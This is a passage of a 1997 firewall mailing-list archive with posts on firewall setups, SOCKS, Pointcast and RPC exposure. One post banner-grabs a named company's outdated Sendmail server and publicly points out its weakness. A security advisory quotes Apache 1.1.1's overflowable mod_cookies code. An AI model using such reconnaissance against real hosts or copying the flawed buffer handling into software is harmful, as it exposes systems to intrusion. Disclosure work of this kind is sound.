EwVngHTyI0UcOTMtnWIuFRzM63xwNU2o031XIhy3B1lYuki8R1uOiVhUUov8RPbH mz9OB54Lx4Y=3D =3DLXv6 -----END PGP SIGNATURE----- -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Jan 11 12:24:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05294 for firewalls-outgoing; Sat, 11 Jan 1997 11:43:25 -0800 (PST) Received: from sf-ptg-ss.pactel.com (sf-ptg-ss.pactel.com [198.95.241.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA05287 for ; Sat, 11 Jan 1997 11:43:18 -0800 (PST) Received: (from smap@localhost) by sf-ptg-ss.pactel.com (8.6.10/8.6.10) id LAA13394; Sat, 11 Jan 1997 11:42:31 -0800 Received: from mmosko.pactel.com(198.95.241.155) by sf-ptg-ss via smap (V1.3) id sma013383; Sat Jan 11 11:42:25 1997 Message-ID: <32D7ED1F.6963@tear.com> Date: Sat, 11 Jan 1997 11:42:24 -0800 From: Marc Mosko Organization: Forte Systems X-Sender: Marc Mosko (Unverified) X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: Paul Ferguson CC: Firewalls Mailing List Subject: Re: [fwd] Hackers Hack Crack, Steal Quake X-Priority: Normal References: <3.0.32.19970111133508.00699150@lint.cisco.com> Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk But they still have an old, outdated sendmail, unprotected by a firewall: Trying 206.224.94.195 ... Connected to crack.com. Escape character is '^]'. 220 crack.crack.com ESMTP Sendmail 8.7.1/8.7.1; Sat, 11 Jan 1997 13:28:02 -0600 quit 221 crack.crack.com closing connection Connection closed by foreign host. -- Marc Mosko Email: marc@tear.com Web: http://www.tear.com/ "If anyone knocks out another's eye, he shall pay him sixty-six shillings, six pence, and a third of a penny." -- Leges Henrici Primi (13th century) PGP Key available via Public Servers and http://www.tear.com/pgp-key.html From firewalls-owner Sat Jan 11 12:44:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06876 for firewalls-outgoing; Sat, 11 Jan 1997 12:34:10 -0800 (PST) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [193.100.176.38]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA06862 for ; Sat, 11 Jan 1997 12:33:58 -0800 (PST) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.4/8.8.4) with UUCP id VAA13590; Sat, 11 Jan 1997 21:16:32 +0100 (MET) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id RAA01954; Sat, 11 Jan 1997 17:56:02 +0100 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id SAA02435; Sat, 11 Jan 1997 18:25:11 +0100 To: Jyri Kaljundi Cc: Firewalls@GreatCircle.COM, gunni@if.is Subject: Re: TCP/IP encrypted connection References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 11 Jan 1997 18:25:09 +0100 In-Reply-To: Jyri Kaljundi's message of Sat, 11 Jan 1997 17:05:38 +0200 (EET) Message-ID: <873ew8azuy.fsf@devnull.ruhr.de> Lines: 17 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jyri Kaljundi writes: > Most of the routers and firewalls you can get in Europe have only weak > encryption, so these should never be used. Hmm, could you explain what you mean by this? We haven't got any strong crypto-stuff manufactured in the US, but there are other manufacturers outside the reach of ITAR. Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From firewalls-owner Sat Jan 11 13:44:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA10157 for firewalls-outgoing; Sat, 11 Jan 1997 13:34:01 -0800 (PST) Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA10111 for ; Sat, 11 Jan 1997 13:33:48 -0800 (PST) Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id QAA06799 for ; Sat, 11 Jan 1997 16:34:55 -0500 (EST) Date: Sat, 11 Jan 1997 16:34:54 -0500 (EST) From: FaNgYoU2 To: firewalls@GreatCircle.com Subject: McCaffee PC Firewall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I received a flyer in the mail that announced that McCaffee now sells a PC Firewall, for single PC's that need to be made secure. I know them for their virus scanner but never heard of the PC Firewall before. Several of the Intranets where I have done performance tuning had a need for something like a PC firewall in areas of higher level administration, budget and finance. Anybody know anything about this PC firewall? FaNgYoU2, Cyberspace^^Vampyre ^^ Touch it, touch it, touch me ... creatures of the Night ^^ From firewalls-owner Sat Jan 11 14:44:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA13088 for firewalls-outgoing; Sat, 11 Jan 1997 14:32:24 -0800 (PST) Received: from news.be.innet.net (news.be.innet.net [194.7.1.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA13080 for ; Sat, 11 Jan 1997 14:32:15 -0800 (PST) Received: from pool011-108.innet.be (pool011-108.innet.be [194.7.12.108]) by news.be.innet.net (8.8.4/8.8.4) with SMTP id XAA11196 for ; Sat, 11 Jan 1997 23:31:27 +0100 (MET) Message-Id: <199701112231.XAA11196@news.be.innet.net> X-Sender: fdehert@pophost.innet.be X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 11 Jan 1997 23:43:23 -0100 To: firewalls@GreatCircle.com From: fdehert@innet.be (Frank J.J. De Hert) Subject: External SCSI port lock. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, This may be a bit off-topic, but I'm looking for a way to protect/disable the external port of an Adaptec SCSI controller. When securing NT workstations connected to the network we disable all unnecessary external capabilities (i.e. floppy drive, serial/parallel port(s)). The only thing we can not secure short from attaching a metal plate to the back of the PC is the external SCSI port. Currently anybody could come in, attach a SCSI device to the port, at boot up the controller will find the device - if it's a harddrive or CD-ROM it will usualy not need a device driver - the user can now copy on to/from the network whatever he/she likes. Does anybody know of a more elegant way of securing these ports (lock, software). Any help would be greatly appreciated. Regards, Frank. -- Frank De Hert System/Security Manager NATO Programming Centre. It's the damndest job, but some poor schmuck has to do it! From firewalls-owner Sat Jan 11 20:44:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA22499 for firewalls-outgoing; Sat, 11 Jan 1997 20:30:32 -0800 (PST) Received: from m7.sprynet.com ([165.121.2.64]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA22490 for ; Sat, 11 Jan 1997 20:30:25 -0800 (PST) From: jmperez@sprynet.com Received: from [199.174.160.181] (ad42-181.compuserve.com [199.174.160.181]) by m7.sprynet.com (8.6.12/8.6.12) with SMTP id UAA04692 for ; Sat, 11 Jan 1997 20:30:09 -0800 Date: Sat, 11 Jan 1997 20:30:09 -0800 Message-Id: <199701120430.UAA04692@m7.sprynet.com> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Subject: RE: LINUX RedHat To: Firewalls@GreatCircle.COM X-Mailer: SPRY Mail Version: 04.00.06.21 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would appreciate hearing from anyone who has successfully installed a PC-based firewall in a LINUX RedHat environment. We have adopted LINUX RedHat for our company and would prefer the TIS FW Toolkit or some other similar product, although I know BSD OS is recommended most often. I recall reading an EMAIL message on this forum sometime back about a person who charges $2,000 to install TIS FW Toolkit. Perhaps that person has had some experience with RedHat and would like to share his/her knowledge as to what FW would best configure with LINUX RedHat. I have read the LAN Magazine Dec 96 eval of some FWs but none address the RedHat OS. Any help would be greatly appreciated. Thanks in advance. J. Perez From firewalls-owner Sun Jan 12 12:29:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA03627 for firewalls-outgoing; Sun, 12 Jan 1997 12:26:32 -0800 (PST) Received: from tosainu.trimark.com. (tosainu.trimark.com [199.212.228.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA03620 for ; Sun, 12 Jan 1997 12:26:23 -0800 (PST) Received: from firewall.trimark.com. by tosainu.trimark.com. via smtpd (for miles.greatcircle.com [198.102.244.34]) with SMTP; 12 Jan 1997 20:18:04 UT Received: by firewall.trimark.com; id PAA07251; Sun, 12 Jan 1997 15:29:04 GMT Received: from toronto.trimark.com(142.148.1.17) by firewall.trimark.com via smap (V3.1.1) id xma007249; Sun, 12 Jan 97 15:28:43 GMT Received: by toronto.trimark.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5) id <01BC009D.5CF421A0@toronto.trimark.com>; Sun, 12 Jan 1997 15:29:12 -0500 Message-ID: From: Michael Werneburg To: "'firewalls@greatcircle.com'" Subject: SOCKS/HTTP filtering Date: Sun, 12 Jan 1997 15:29:11 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Our webserver sits behind a firewall which is configured to allow only incoming http/https and things like mail and news (obviously not intended for our web servers). Everything appears to be working, except: A user of our web site is using desktop browser behind a SOCKS gateway. Upon every attempt to submit a form via POST, he gets a bizarre message which reads "Your browser sent a non-HTTP compliant message." I suspect that his SOCKS gateway is attempting some filtering, and decided that it didn't like the outgoing message. Does anyone have any experience with a problem resembling this? -Michael ___________________________ Michael Werneburg Trimark Investment Management Inc. mwernebu@trimark.com ___________________________ Michael Werneburg Trimark Investment Management Inc. mwernebu@trimark.com From firewalls-owner Sun Jan 12 12:59:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA04049 for firewalls-outgoing; Sun, 12 Jan 1997 12:41:19 -0800 (PST) Received: from tcpip.geek.net (lin-pm3-024.inetnebr.com [206.222.210.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA04041 for ; Sun, 12 Jan 1997 12:41:11 -0800 (PST) Received: from localhost (brian@localhost) by tcpip.geek.net (8.7.4/8.7.3) with SMTP id OAA00398; Sun, 12 Jan 1997 14:32:32 -0600 (CST) X-Authentication-Warning: tcpip.geek.net: brian owned process doing -bs Date: Sun, 12 Jan 1997 14:32:32 -0600 (CST) From: Brian Mitchell X-Sender: brian@tcpip.geek.net To: Rob Sansom cc: firewalls-l Subject: Re: RCP tcp/udp 111 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 10 Jan 1997, Rob Sansom wrote: > Wow, I'm actually posting, and breaking my New Years resolution not to write > email first thing in the morning... > > RPC Portmapper. Very bad to allow people to connect to this, since they can > find out what sorts of RPC services you run on your host (if I'm correct). Alas, blocking it does not really stop them from doing that, it just makes it a wee bit more difficult (and it really isnot all that difficult, even without portmapper access). Nonetheless, it should be blocked... Brian Mitchell / brian@saturn.net http://www.saturn.net/~brian/security/ From firewalls-owner Sun Jan 12 17:59:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA13560 for firewalls-outgoing; Sun, 12 Jan 1997 17:54:17 -0800 (PST) Received: from silence.secnet.com ([204.191.222.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA13553 for ; Sun, 12 Jan 1997 17:54:05 -0800 (PST) Received: from localhost (davids@localhost) by silence.secnet.com (8.8.4/secnet) with SMTP id TAA20897 for ; Sun, 12 Jan 1997 19:50:43 -0700 (MST) Date: Sun, 12 Jan 1997 19:50:43 -0700 (MST) From: David Sacerdote To: firewalls@greatcircle.com Subject: Apache 1.1.1 overflow Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ###### ## ## ###### ## ### ## ## ###### ## # ## ## ## ## ### ## ###### . ## ## . ######. Secure Networks Inc. Security Advisory January 12, 1997 Vulnerabilities in the Apache httpd There is a serious vulnerability in the cookies module of the Apache httpd, version 1.1.1 and earlier, which makes it possible for remote individuals to obtain access to systems running the Apache httpd. Only sites which enabled mod_cookies, a nondefault option, are vulnerable. Technical Details ~~~~~~~~~~~~~~~~~ The function make_cookie, in mod_cookies.c uses a 100 byte buffer, new_cookie to store information used to track web site users. The hostname, which with even the most cautious of resolver libraries, can be up to 255 characters long, is stuffed into this buffer, along with the string "apache=" and a number. The offending code reads: void make_cookie(request_rec *r) { struct timeval tv; char new_cookie[100]; /* blurgh */ char *dot; const char *rname = pstrdup(r->pool, get_remote_host(r->connection, r->per_dir_config, REMOTE_NAME)); struct timezone tz = { 0 , 0 }; if ((dot = strchr(rname,'.'))) *dot='\0'; /* First bit of hostname */ gettimeofday(&tv, &tz); sprintf(new_cookie,"%s%s%d%ld%d; path=/", COOKIE_NAME, rname, (int)getpid(), (long)tv.tv_sec, (int)tv.tv_usec/1000 ); table_set(r->headers_out,"Set-Cookie",new_cookie); return; } Note that although the get_remote_host() function converts all uppercase letters to lowercase letters, there is at least one way in which a determined attacker can still exploit the overflow. Impact ~~~~~~ Remote individuals can obtain access to the web server. If the httpd services requests as user root, attackers can obtain root access. If the httpd is run in a chroot() environment, the attacker will be restricted to the chrooted environment. We strongly advise adminstrators to run their web servers as an unpriviliged user in an chrooted environment whenever possible. Vulnerable Systems ~~~~~~~~~~~~~~~~~~ Any system running the Apache httpd 1.1.1 or earlier, with the compile-time option mod_cookies enabled is vulnerable. To tell which web server software you are using, telnet to port 80 of the web server, and issue the command: GET / HTTP/1.0 to the web server, followed by two carriage returns. You should see something which looks like: $ telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 200 OK Date: Tue, 07 Jan 1997 18:59:31 GMT Server: Apache/1.1.1 Content-type: text/html Set-Cookie: Apache=localhost9185266357164; path=/ From firewalls-owner Sun Jan 12 19:29:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16163 for firewalls-outgoing; Sun, 12 Jan 1997 19:13:09 -0800 (PST) Received: from kexin.kexin.co.kr (kexin2.kexin.co.kr [210.126.192.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA16154 for ; Sun, 12 Jan 1997 19:12:58 -0800 (PST) Received: by kexin.kexin.co.kr; id VAA24418; Mon, 13 Jan 1997 21:09:24 +0900 (JST) Message-Id: <199701131209.VAA24418@kexin.kexin.co.kr> Received: from unknown(201.201.1.4) by kexin.kexin.co.kr via smap (V3.1.1) id xma024416; Mon, 13 Jan 97 21:09:13 +0900 From: "Jung Jun Lee" To: "GreatCircle" Subject: How can I configure hidden DNS on TIS? Date: Mon, 13 Jan 1997 12:13:40 +0900 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-2022-KR Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk $)CHi.. If I configure TIS to primary DNS, Can I use internal DNS for hidden? Thanks From firewalls-owner Sun Jan 12 19:46:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16473 for firewalls-outgoing; Sun, 12 Jan 1997 19:18:46 -0800 (PST) Received: from silence.secnet.com ([204.191.222.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA16455 for ; Sun, 12 Jan 1997 19:18:34 -0800 (PST) Received: from localhost (davids@localhost) by silence.secnet.com (8.8.4/secnet) with SMTP id VAA00538 for ; Sun, 12 Jan 1997 21:14:44 -0700 (MST) Date: Sun, 12 Jan 1997 21:14:44 -0700 (MST) From: David Sacerdote Reply-To: David Sacerdote To: firewalls@greatcircle.com Subject: truncated advisory Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It appears that the advisory I just posted to the firewalls mailing list was truncated somewhere in the moderation or distribution process. The full text can be found at ftp://ftp.secnet.com/pub/advisories/APACHE_MOD.1.13.97 My apologies, David Sacerdote From firewalls-owner Sun Jan 12 21:47:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA23736 for firewalls-outgoing; Sun, 12 Jan 1997 21:28:47 -0800 (PST) Received: from mx.globalsrv.com (mx.globalsrv.com [207.17.80.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id VAA23238 for ; Sun, 12 Jan 1997 21:27:30 -0800 (PST) Received: (qmail 32179 invoked from smtpd); 13 Jan 1997 06:27:31 -0000 Received: from pineal.encephalon.com (208.199.232.82) by mx.globalsrv.com with SMTP; 13 Jan 1997 06:27:31 -0000 Message-ID: <32D9C7E1.41C6@encephalon.com> Date: Sun, 12 Jan 1997 23:28:01 -0600 From: Joel Colvin Organization: Colvin Training & Consulting X-Mailer: Mozilla 3.01Gold (X11; I; SCO_SV 3.2 i386) MIME-Version: 1.0 To: Firewalls Mailing List Subject: tn-gw problems Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having trouble with tn-gw. It compiled without problems but when I telnet to it I get: Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. pineal.encephalon.com telnet proxy (Version V2.0beta) ready: tn-gw-> Connection closed by foreign host. The syslog shows a permit host and if I have a welcome message then it is displayed before the connection closes. I have commented out everything in netperms-table except: netacl-telnetd: permit-hosts * -exec /usr/local/etc/tn-gw tn-gw: permit-hosts 127.0.0.1 I am using to fwtk-2.0 but had the same problem with previous versions. Any ideas? -- Joel Colvin From firewalls-owner Sun Jan 12 23:59:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA00262 for firewalls-outgoing; Sun, 12 Jan 1997 23:55:55 -0800 (PST) Received: from garanti1.garanti.com.tr ([194.54.51.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA00255; Sun, 12 Jan 1997 23:55:43 -0800 (PST) Received: from Mailhub by garanti1.garanti.com.tr id AA09858; Mon, 13 Jan 1997 09:56:12 +0300 Received: from GarantiUser by GarantiMailServer id AA20676; Mon, 13 Jan 1997 09:54:00 +0300 Received: by SMTPGW.FW.GARANTI.COM.TR with Microsoft Mail id <32DA769B@SMTPGW.FW.GARANTI.COM.TR>; Mon, 13 Jan 97 09:53:31 PST From: "Cihan Subasi (Garanti Tic)" To: CihanS , firewall-digest , firewalls-owner , firewalls , mjp2 Subject: Re: RealAudio clients behind the FW... Date: Mon, 13 Jan 97 09:51:00 PST Message-Id: <32DA769B@SMTPGW.FW.GARANTI.COM.TR> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- But I'm running SOCKS PROXY on the FW and seems like I cant set SOCKS host on the RA client.... ---------------------------------------------------------------------------- -- Set it to TCP. At 03:32 PM 1/10/97 PST, you wrote: > > > I'm having problems configuring FW to allow RealAudio packets...Port >7070 seems open but data transmission on a UDP port do not occur...Please >help.... > > Thanks > Cihan > > Mike Papais mjp2@chrysler.com Chrysler Corporation 810-497-1193 (tie 897) From firewalls-owner Mon Jan 13 00:15:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA29927 for firewalls-outgoing; Sun, 12 Jan 1997 23:43:48 -0800 (PST) Received: from mail.toronto.istar.net (mail.toronto.istar.net [204.191.136.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA29914 for ; Sun, 12 Jan 1997 23:43:39 -0800 (PST) Received: from istar.ca (istar.ca [204.191.136.4]) by mail.toronto.istar.net (8.8.4/8.8.4) with ESMTP id CAA04244; Mon, 13 Jan 1997 02:29:33 -0500 (EST) Received: from slip166-72-77-154.ga.us.ibm.net (slip166-72-77-154.ga.us.ibm.net [166.72.77.154]) by istar.ca (8.8.4/8.8.4) with SMTP id CAA24752; Mon, 13 Jan 1997 02:43:26 -0500 (EST) Received: by slip166-72-77-154.ga.us.ibm.net with Microsoft Mail id <01BC00FB.6E36AEC0@slip166-72-77-154.ga.us.ibm.net>; Mon, 13 Jan 1997 02:42:34 -0500 Message-ID: <01BC00FB.6E36AEC0@slip166-72-77-154.ga.us.ibm.net> From: Gene Lee To: "'firewalls@greatcircle.com'" , "'Michael Werneburg'" Subject: RE: SOCKS/HTTP filtering Date: Mon, 13 Jan 1997 02:42:32 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sunday, January 12, 1997 3:29 PM, Michael Werneburg[SMTP:MWernebu@trimark.com] wrote: >Our webserver sits behind a firewall which is configured to allow only >incoming http/https and things like mail and news (obviously not >intended for our web servers). Everything appears to be working, >except: > >A user of our web site is using desktop browser behind a SOCKS gateway. >Upon every attempt to submit a form via POST, he gets a bizarre message >which reads "Your browser sent a non-HTTP compliant message." > >I suspect that his SOCKS gateway is attempting some filtering, and >decided that it didn't like the outgoing message. Does anyone have any >experience with a problem resembling this? Need more info. What kind of SOCKS server is he using? What kind of client is he using? -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Mon Jan 13 00:29:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA29862 for firewalls-outgoing; Sun, 12 Jan 1997 23:41:32 -0800 (PST) Received: from mail.toronto.istar.net (mail.toronto.istar.net [204.191.136.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA29848 for ; Sun, 12 Jan 1997 23:41:23 -0800 (PST) Received: from istar.ca (istar.ca [204.191.136.4]) by mail.toronto.istar.net (8.8.4/8.8.4) with ESMTP id CAA04176; Mon, 13 Jan 1997 02:26:59 -0500 (EST) Received: from slip166-72-77-154.ga.us.ibm.net (slip166-72-77-154.ga.us.ibm.net [166.72.77.154]) by istar.ca (8.8.4/8.8.4) with SMTP id CAA24027; Mon, 13 Jan 1997 02:40:53 -0500 (EST) Received: by slip166-72-77-154.ga.us.ibm.net with Microsoft Mail id <01BC00FB.12BE8B80@slip166-72-77-154.ga.us.ibm.net>; Mon, 13 Jan 1997 02:40:01 -0500 Message-ID: <01BC00FB.12BE8B80@slip166-72-77-154.ga.us.ibm.net> From: Gene Lee To: mike , "'Gabriel Dura'" Cc: "firewalls@GreatCircle.COM" Subject: RE: FW-1 hacked? - Reply Date: Mon, 13 Jan 1997 02:39:59 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote: > >There is a guy, working on his own, who claims he knows how to penetrate >FBI's firewall. >As a proof I was told that behind the firewall there is there is another >computer 'phi.fbi.gov'. Just because you can name a hostname behind the firewall is no proof of penetration. A good example is in a "polite" SMTP (also NNTP) transaction, say through a SOCKS server, the host sending the message also sends it's hostname, which means that that the e-mail has an internal hostname in it's header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker). If I were you, I'd ask for a bit more proof than a flimsy internal hostname... -- Gene Lee genel@inforamp.net genelee@vnet.ibm.com From firewalls-owner Mon Jan 13 00:53:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA01306 for firewalls-outgoing; Mon, 13 Jan 1997 00:16:16 -0800 (PST) Received: from malraux.matranet.com (malraux.matranet.com [194.117.213.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA01299 for ; Mon, 13 Jan 1997 00:16:02 -0800 (PST) Received: (from uucp@localhost) by malraux.matranet.com (8.8.4/8.7.3) id JAA15985; Mon, 13 Jan 1997 09:05:37 +0100 (MET) Received: from verlaine.imatranet.com(192.0.2.2) by malraux.matranet.com via smap (3.2) id xma015977; Mon, 13 Jan 97 09:05:11 +0100 Received: from kafka.imatranet.com ([192.0.2.22]) by verlaine.imatranet.com (post.office MTA v2.0 0813 ID# 0-29132U60) with ESMTP id AAC300; Mon, 13 Jan 1997 09:14:08 +0100 From: "Xavier Fauquet" To: "Henry W. Farkas" , "Starkweather, Mike" Cc: "'firewalls@GreatCircle.COM'" Subject: Re: Pointcast Date: Sun, 12 Jan 1997 22:29:10 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19970113081407269.AAC300@kafka.imatranet.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk And what should I do on the firewall if I want to stop Poincast trafic ? Xavier ---------- > From: Henry W. Farkas > To: Starkweather, Mike > Cc: 'firewalls@GreatCircle.COM' > Subject: Re: Pointcast > Date: mercredi 8 janvier 1997 13:56 > > On Tue, 7 Jan 1997, Starkweather, Mike wrote: > > > I am wondering how the members of this mail list have handled the > > flood of traffic generated by Pointcast. It has buried our firewall > > (Tis Toolkit) with the huge number of requests it generates. Their > > I-Server seems to help some but not as much as I had hoped. > For starters, you might ask everyone to update on a limited schedule, > customized schedule, or manually: that is, only when the update button > is pressed. > > We had the same problem. It turns out that most people simply did not > understand the implications of the "all day schedule" option, which claims > to be "best for direct internet connections". So, that's what many people > chose. > > Simply informing them helped quite a bit, but we are still considering > getting our own Pointcast server. Partly because there is an "early > morning slam" on our firewalls, caused by a flood of people coming in, > updating Pointcast and reading Dilbert.... > > ============================================================================ === > Outside of a dog, a book is a man's best friend. > Inside of a dog, it's too dark to read. > PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53 From firewalls-owner Mon Jan 13 01:44:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA08537 for firewalls-outgoing; Mon, 13 Jan 1997 01:28:40 -0800 (PST) Received: from router.connectnet.net.au (router.connectnet.net.au [203.25.180.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA08529 for ; Mon, 13 Jan 1997 01:28:31 -0800 (PST) Received: from phreak (phreak.melb.hpaus.net [203.21.64.225]) by router.connectnet.net.au (8.8.2/8.7.3/lazerjem) with SMTP id UAA06438 for ; Mon, 13 Jan 1997 20:28:15 +1100 Message-Id: <3.0.32.19970113202813.00917420@connectnet.net.au> X-Sender: andrew@connectnet.net.au X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 13 Jan 1997 20:28:15 +1100 To: firewalls@GreatCircle.COM From: Andrew Whittle Subject: Re: Pointcast Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I downloaded the new version of the pointcast plugin yesterday, it now supports getting the files via web proxies, get the new version and make your staff turn on the proxy... Andrew -- ========================================================================= - Andrew Whittle - andrew@connectoz.net - - http://www.connectoz.net/~andrew/ - ========================================================================= From firewalls-owner Mon Jan 13 02:15:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA10153 for firewalls-outgoing; Mon, 13 Jan 1997 01:58:03 -0800 (PST) Received: from sfs01.winternet.co.at ([194.118.33.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA10134 for ; Mon, 13 Jan 1997 01:57:53 -0800 (PST) Received: from async12.pinrt4.telecom.at [194.118.2.112] (HELO winternet.co.at) by sfs01.winternet.co.at (AltaVista Mail V1.0/1.0 BL18 listener) id 0000_005e_32da_07d9_99f0; Mon, 13 Jan 1997 11:00:57 +0100 Received: from wintermute.w-inet.at (localhost [127.0.0.1]) by winternet.co.at (8.7.6/8.7.3) with ESMTP id RAA17194 for ; Mon, 13 Jan 1997 17:55:19 +0100 Message-Id: <199701131655.RAA17194@winternet.co.at> X-Mailer: exmh version 2.0beta 12/23/96 Reply-to: rammeri@winternet.co.at From: rammeri@winternet.co.at To: firewalls@greatcircle.com Subject: Secure firewall with only Linux-Kernel filtering possible? X-IRCNick: KPanic X-IRCNet: EF-Net Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Mon, 13 Jan 1997 17:55:18 +0100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Assume the following situation: We are a company with 25 computer systems in a LAN, and with a 64k connection to the internet. So ... my question is ... is the following security-shema good or why not? Our LAN is divided into several parts, so we use 192.168.0.0 - 192.168.4.0 for our internet network. Between the router to the internet and the first local router, we have a firewall-setup with only the linux-kernel-filtering/masquerading. The firewall allows any connections to be made from the internal-net. But disallows any connection but a port 25 that will be forwarded to out mail-host in the internal net (even this connection is limited to our MX host). The firewall disallows incoming ftp-data. On the firewall there is NO daemon runnning, not even telnet for administration or sth. like this. ... Ok .. so tell me please, why is this setup insecure? thx, ingo -- 